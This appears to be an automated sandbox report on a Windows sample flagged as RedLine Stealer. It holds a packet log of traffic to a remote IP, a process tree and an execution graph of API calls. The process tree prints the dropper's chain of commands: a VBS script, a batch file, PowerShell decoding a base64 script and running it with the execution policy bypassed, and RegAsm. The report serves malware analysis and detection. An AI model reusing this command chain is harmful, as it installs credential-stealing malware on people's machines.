                                                                                                                                  Apr 26, 2024 02:42:12.636574984 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.636897087 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.637320995 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.637415886 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.637835979 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638024092 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638600111 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638761044 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.638983965 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.639218092 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.639333963 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.639980078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640023947 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640150070 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640183926 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.640249014 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.853771925 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.895976067 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.896229029 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.896260023 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.896296978 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.896311998 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.896687031 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897113085 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897243977 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897397995 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897430897 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897530079 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897706985 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.897885084 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898102045 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898236990 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898329973 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898468018 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898606062 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.898863077 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899075031 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899203062 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899378061 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.899646997 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:12.900094986 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:12.900163889 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.157602072 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.157780886 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.157907009 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158054113 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158180952 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158360958 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158557892 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.158704996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159090996 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159146070 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159261942 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159384966 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159647942 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159915924 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.159975052 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160090923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160166979 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160221100 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.160845995 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161020994 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161241055 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161365032 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161575079 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161920071 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.161981106 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162084103 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162282944 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162348032 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162568092 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162801027 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.162887096 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.162946939 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.162993908 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163039923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163197041 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163444042 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163716078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163814068 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.163902998 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.164230108 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.164402962 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.164478064 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.423924923 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.423944950 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424324036 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424390078 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424405098 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424592972 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.424767017 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425087929 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425209045 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425340891 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425437927 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425714016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425971985 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.425987005 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426023960 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.426086903 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.426151037 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426389933 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426505089 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426734924 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.426846027 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.427064896 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.427143097 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.427578926 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.687210083 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.687347889 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.687773943 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688036919 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688060999 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688318014 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688575029 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688699007 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688865900 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.688973904 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689162016 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689251900 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689554930 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689656973 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689702034 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689899921 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.689922094 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690185070 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690342903 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690536976 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690717936 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.690787077 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.691847086 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.694356918 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:13.958193064 CEST18418497305.42.92.179192.168.2.4
                                                                                                                                  Apr 26, 2024 02:42:13.962606907 CEST4973018418192.168.2.45.42.92.179
                                                                                                                                  Apr 26, 2024 02:42:14.223984957 CEST18418497305.42.92.179192.168.2.4
Target ID: 0
Start time: 02:41:49
Start date: 26/04/2024
Path: C:\Users\user\Desktop\f6FauZ2CEz.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\f6FauZ2CEz.exe"
Imagebase: 0x400000
File size: 372'912 bytes
MD5 hash: 1544DBCA0EFC2C0105DD7D52A21A8891
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:41:52
Start date: 26/04/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "wscript.exe" "C:\Users\user\start.vbs"
Imagebase: 0x6b0000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 2
Start time: 02:41:52
Start date: 26/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:41:53
Start date: 26/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:41:53
Start date: 26/04/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\user\QJHJap.ps1' -Encoding UTF8"
Imagebase: 0x4b0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 02:41:54
Start date: 26/04/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
Imagebase: 0x4b0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 6
Start time: 02:41:58
Start date: 26/04/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase: 0xb70000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 14%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 16.1%
Total number of Nodes: 1336
Total number of Limit Nodes: 15
3922->3921 3924 402bc4 IIDFromString 3922->3924 3927 402b7f 3923->3927 3924->3921 3925 402bd3 3924->3925 3925->3921 3931 406557 lstrcpynW 3925->3931 3930 40649e wsprintfW 3927->3930 3928 402bf0 CoTaskMemFree 3928->3921 3930->3921 3931->3928 3932 401761 3933 402dab 21 API calls 3932->3933 3934 401768 3933->3934 3935 406076 2 API calls 3934->3935 3936 40176f 3935->3936 3936->3936 3937 401d62 3938 402d89 21 API calls 3937->3938 3939 401d73 SetWindowLongW 3938->3939 3940 402c2f 3939->3940 3941 4028e3 3942 4028eb 3941->3942 3943 4028ef FindNextFileW 3942->3943 3946 402901 3942->3946 3944 402948 3943->3944 3943->3946 3947 406557 lstrcpynW 3944->3947 3947->3946 3948 403be7 3949 403bf2 3948->3949 3950 403bf9 GlobalAlloc 3949->3950 3951 403bf6 3949->3951 3950->3951 3952 401568 3953 402ba9 3952->3953 3956 40649e wsprintfW 3953->3956 3955 402bae 3956->3955 3957 40196d 3958 402d89 21 API calls 3957->3958 3959 401974 3958->3959 3960 402d89 21 API calls 3959->3960 3961 401981 3960->3961 3962 402dab 21 API calls 3961->3962 3963 401998 lstrlenW 3962->3963 3965 4019a9 3963->3965 3964 4019ea 3965->3964 3969 406557 lstrcpynW 3965->3969 3967 4019da 3967->3964 3968 4019df lstrlenW 3967->3968 3968->3964 3969->3967 3970 40166f 3971 402dab 21 API calls 3970->3971 3972 401675 3971->3972 3973 4068b4 2 API calls 3972->3973 3974 40167b 3973->3974 3975 402af0 3976 402d89 21 API calls 3975->3976 3977 402af6 3976->3977 3978 406594 21 API calls 3977->3978 3979 402933 3977->3979 3978->3979 3980 4026f1 3981 402d89 21 API calls 3980->3981 3988 402700 3981->3988 3982 40283d 3983 40274a ReadFile 3983->3982 3983->3988 3984 4060ca ReadFile 3984->3988 3985 40278a MultiByteToWideChar 3985->3988 3986 40283f 3993 40649e wsprintfW 3986->3993 3987 406128 5 API calls 3987->3988 3988->3982 3988->3983 3988->3984 3988->3985 3988->3986 3988->3987 3990 4027b0 SetFilePointer MultiByteToWideChar 3988->3990 3992 402850 3988->3992 3990->3988 3991 402871 SetFilePointer 3991->3982 3992->3982 3992->3991 3993->3982 3394 
401774 3433 402dab 3394->3433 3396 40177b 3397 4017a3 3396->3397 3398 40179b 3396->3398 3441 406557 lstrcpynW 3397->3441 3440 406557 lstrcpynW 3398->3440 3401 4017a1 3405 406805 5 API calls 3401->3405 3402 4017ae 3403 405e26 3 API calls 3402->3403 3404 4017b4 lstrcatW 3403->3404 3404->3401 3416 4017c0 3405->3416 3406 4017c6 3407 4068b4 2 API calls 3406->3407 3410 4017d2 CompareFileTime 3406->3410 3406->3416 3407->3406 3408 406022 2 API calls 3408->3416 3410->3406 3411 401892 3412 4055dc 28 API calls 3411->3412 3414 40189c 3412->3414 3413 4055dc 28 API calls 3415 40187e 3413->3415 3417 4032b9 35 API calls 3414->3417 3416->3406 3416->3408 3416->3411 3420 406594 21 API calls 3416->3420 3425 406557 lstrcpynW 3416->3425 3430 405bb7 MessageBoxIndirectW 3416->3430 3431 401869 3416->3431 3439 406047 GetFileAttributesW CreateFileW 3416->3439 3418 4018af 3417->3418 3419 4018c3 SetFileTime 3418->3419 3421 4018d5 FindCloseChangeNotification 3418->3421 3419->3421 3420->3416 3421->3415 3422 4018e6 3421->3422 3423 4018eb 3422->3423 3424 4018fe 3422->3424 3426 406594 21 API calls 3423->3426 3427 406594 21 API calls 3424->3427 3425->3416 3428 4018f3 lstrcatW 3426->3428 3429 401906 3427->3429 3428->3429 3432 405bb7 MessageBoxIndirectW 3429->3432 3430->3416 3431->3413 3431->3415 3432->3415 3434 402db7 3433->3434 3435 406594 21 API calls 3434->3435 3436 402dd8 3435->3436 3437 402de4 3436->3437 3438 406805 5 API calls 3436->3438 3437->3396 3438->3437 3439->3416 3440->3401 3441->3402 3994 4014f5 SetForegroundWindow 3995 402c2f 3994->3995 3996 401a77 3997 402d89 21 API calls 3996->3997 3998 401a80 3997->3998 3999 402d89 21 API calls 3998->3999 4000 401a25 3999->4000 4001 401578 4002 401591 4001->4002 4003 401588 ShowWindow 4001->4003 4004 402c2f 4002->4004 4005 40159f ShowWindow 4002->4005 4003->4002 4005->4004 4006 4023f9 4007 402dab 21 API calls 4006->4007 4008 402408 4007->4008 4009 402dab 21 API calls 4008->4009 4010 402411 4009->4010 4011 402dab 21 API calls 4010->4011 4012 40241b 
GetPrivateProfileStringW 4011->4012 4013 401ffb 4014 402dab 21 API calls 4013->4014 4015 402002 4014->4015 4016 4068b4 2 API calls 4015->4016 4017 402008 4016->4017 4019 402019 4017->4019 4020 40649e wsprintfW 4017->4020 4020->4019 4021 401b7c 4022 402dab 21 API calls 4021->4022 4023 401b83 4022->4023 4024 402d89 21 API calls 4023->4024 4025 401b8c wsprintfW 4024->4025 4026 402c2f 4025->4026 4027 401000 4028 401037 BeginPaint GetClientRect 4027->4028 4029 40100c DefWindowProcW 4027->4029 4031 4010f3 4028->4031 4034 401179 4029->4034 4032 401073 CreateBrushIndirect FillRect DeleteObject 4031->4032 4033 4010fc 4031->4033 4032->4031 4035 401102 CreateFontIndirectW 4033->4035 4036 401167 EndPaint 4033->4036 4035->4036 4037 401112 6 API calls 4035->4037 4036->4034 4037->4036 4038 404980 4039 404990 4038->4039 4040 4049b6 4038->4040 4041 4044d6 22 API calls 4039->4041 4042 40453d 8 API calls 4040->4042 4043 40499d SetDlgItemTextW 4041->4043 4044 4049c2 4042->4044 4043->4040 4045 401680 4046 402dab 21 API calls 4045->4046 4047 401687 4046->4047 4048 402dab 21 API calls 4047->4048 4049 401690 4048->4049 4050 402dab 21 API calls 4049->4050 4051 401699 MoveFileW 4050->4051 4052 4016a5 4051->4052 4053 4016ac 4051->4053 4055 401423 28 API calls 4052->4055 4054 4068b4 2 API calls 4053->4054 4057 4022fb 4053->4057 4056 4016bb 4054->4056 4055->4057 4056->4057 4058 406317 40 API calls 4056->4058 4058->4052 4059 401503 4060 401508 4059->4060 4062 401520 4059->4062 4061 402d89 21 API calls 4060->4061 4061->4062 4063 401a04 4064 402dab 21 API calls 4063->4064 4065 401a0b 4064->4065 4066 402dab 21 API calls 4065->4066 4067 401a14 4066->4067 4068 401a1b lstrcmpiW 4067->4068 4069 401a2d lstrcmpW 4067->4069 4070 401a21 4068->4070 4069->4070 4071 402304 4072 402dab 21 API calls 4071->4072 4073 40230a 4072->4073 4074 402dab 21 API calls 4073->4074 4075 402313 4074->4075 4076 402dab 21 API calls 4075->4076 4077 40231c 4076->4077 4078 4068b4 2 API calls 4077->4078 4079 402325 4078->4079 4080 
402336 lstrlenW lstrlenW 4079->4080 4084 402329 4079->4084 4082 4055dc 28 API calls 4080->4082 4081 4055dc 28 API calls 4085 402331 4081->4085 4083 402374 SHFileOperationW 4082->4083 4083->4084 4083->4085 4084->4081 4084->4085 4086 401d86 4087 401d99 GetDlgItem 4086->4087 4088 401d8c 4086->4088 4089 401d93 4087->4089 4090 402d89 21 API calls 4088->4090 4091 401dda GetClientRect LoadImageW SendMessageW 4089->4091 4092 402dab 21 API calls 4089->4092 4090->4089 4094 401e38 4091->4094 4096 401e44 4091->4096 4092->4091 4095 401e3d DeleteObject 4094->4095 4094->4096 4095->4096 4097 402388 4098 4023a2 4097->4098 4099 40238f 4097->4099 4100 406594 21 API calls 4099->4100 4101 40239c 4100->4101 4102 405bb7 MessageBoxIndirectW 4101->4102 4102->4098 3474 401389 3476 401390 3474->3476 3475 4013fe 3476->3475 3477 4013cb MulDiv SendMessageW 3476->3477 3477->3476 4103 402c0a SendMessageW 4104 402c24 InvalidateRect 4103->4104 4105 402c2f 4103->4105 4104->4105 4106 40460c lstrcpynW lstrlenW 4107 40248f 4108 402dab 21 API calls 4107->4108 4109 4024a1 4108->4109 4110 402dab 21 API calls 4109->4110 4111 4024ab 4110->4111 4124 402e3b 4111->4124 4114 4024e3 4116 4024ef 4114->4116 4119 402d89 21 API calls 4114->4119 4115 402dab 21 API calls 4118 4024d9 lstrlenW 4115->4118 4120 40250e RegSetValueExW 4116->4120 4121 4032b9 35 API calls 4116->4121 4117 402933 4118->4114 4119->4116 4122 402524 RegCloseKey 4120->4122 4121->4120 4122->4117 4125 402e56 4124->4125 4128 4063f2 4125->4128 4129 406401 4128->4129 4130 4024bb 4129->4130 4131 40640c RegCreateKeyExW 4129->4131 4130->4114 4130->4115 4130->4117 4131->4130 4132 402910 4133 402dab 21 API calls 4132->4133 4134 402917 FindFirstFileW 4133->4134 4135 40292a 4134->4135 4136 40293f 4134->4136 4140 40649e wsprintfW 4136->4140 4138 402948 4141 406557 lstrcpynW 4138->4141 4140->4138 4141->4135 4142 401911 4143 401948 4142->4143 4144 402dab 21 API calls 4143->4144 4145 40194d 4144->4145 4146 405c63 71 API calls 4145->4146 4147 401956 4146->4147 4148 
401491 4149 4055dc 28 API calls 4148->4149 4150 401498 4149->4150 4151 401914 4152 402dab 21 API calls 4151->4152 4153 40191b 4152->4153 4154 405bb7 MessageBoxIndirectW 4153->4154 4155 401924 4154->4155 4156 404695 4157 4046ad 4156->4157 4160 4047c7 4156->4160 4161 4044d6 22 API calls 4157->4161 4158 404831 4159 40483b GetDlgItem 4158->4159 4162 4048fb 4158->4162 4163 404855 4159->4163 4164 4048bc 4159->4164 4160->4158 4160->4162 4165 404802 GetDlgItem SendMessageW 4160->4165 4166 404714 4161->4166 4167 40453d 8 API calls 4162->4167 4163->4164 4171 40487b SendMessageW LoadCursorW SetCursor 4163->4171 4164->4162 4172 4048ce 4164->4172 4189 4044f8 EnableWindow 4165->4189 4169 4044d6 22 API calls 4166->4169 4170 4048f6 4167->4170 4176 404721 CheckDlgButton 4169->4176 4190 404944 4171->4190 4173 4048e4 4172->4173 4174 4048d4 SendMessageW 4172->4174 4173->4170 4178 4048ea SendMessageW 4173->4178 4174->4173 4175 40482c 4179 404920 SendMessageW 4175->4179 4187 4044f8 EnableWindow 4176->4187 4178->4170 4179->4158 4182 40473f GetDlgItem 4188 40450b SendMessageW 4182->4188 4184 404755 SendMessageW 4185 404772 GetSysColor 4184->4185 4186 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4184->4186 4185->4186 4186->4170 4187->4182 4188->4184 4189->4175 4193 405b7d ShellExecuteExW 4190->4193 4192 4048aa LoadCursorW SetCursor 4192->4164 4193->4192 4194 402896 4195 40289d 4194->4195 4196 402bae 4194->4196 4197 402d89 21 API calls 4195->4197 4198 4028a4 4197->4198 4199 4028b3 SetFilePointer 4198->4199 4199->4196 4200 4028c3 4199->4200 4202 40649e wsprintfW 4200->4202 4202->4196 4203 401f17 4204 402dab 21 API calls 4203->4204 4205 401f1d 4204->4205 4206 402dab 21 API calls 4205->4206 4207 401f26 4206->4207 4208 402dab 21 API calls 4207->4208 4209 401f2f 4208->4209 4210 402dab 21 API calls 4209->4210 4211 401f38 4210->4211 4212 401423 28 API calls 4211->4212 4213 401f3f 4212->4213 4220 405b7d ShellExecuteExW 4213->4220 4215 401f87 4216 4069f6 5 API calls 4215->4216 
